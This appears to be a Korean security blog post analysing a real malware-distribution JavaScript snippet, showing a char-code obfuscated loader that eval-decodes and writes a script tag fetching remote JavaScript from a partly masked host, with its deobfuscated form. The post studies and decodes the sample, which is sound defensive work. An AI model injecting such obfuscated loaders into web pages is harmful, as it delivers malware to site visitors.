t 라는 변수에 10진수의 값을 나열하는 형태의 코드이다. 단순히 아스키 코드표에서 10진수의 60, 115, 99 ....를 쫓아가면서 난독화를 해제 할 수 있지만, Mazilla나 JSDetox와 같은 툴로 클릭 한번이면 풀리는 난독화 이기 때문에 어렵지는 않다.
난독화
<script>
t="60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,42,42,42,42,42,42,46,99,
111,46,107,114,47,106,115,47,99,111,109,46,106,115,62,60,47,115,99,114,105,112,116,62"
t=eval("String.fromCharCode("+t+")");
document.write(t);
</script>
난독화 해제 후
<script>
t="<script src=http://******.co.kr/js/com.js></script>"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>
* 실제 악성코드 유포하는 소스코드 중 샘플이기 때문에 일부 내용을 변경하였습니다.
반응형
'Information Security > Malware' 카테고리의 다른 글
| Split Obfuscated (0) | 2013.06.07 |
|---|---|
| JSMin Javascript Compressor (0) | 2013.06.07 |
| 악성코드 스트링값 (0) | 2013.05.09 |
| VIP CK Deofuscation (0) | 2013.03.28 |
| Obfuscation 해제 실습 (0) | 2013.03.12 |
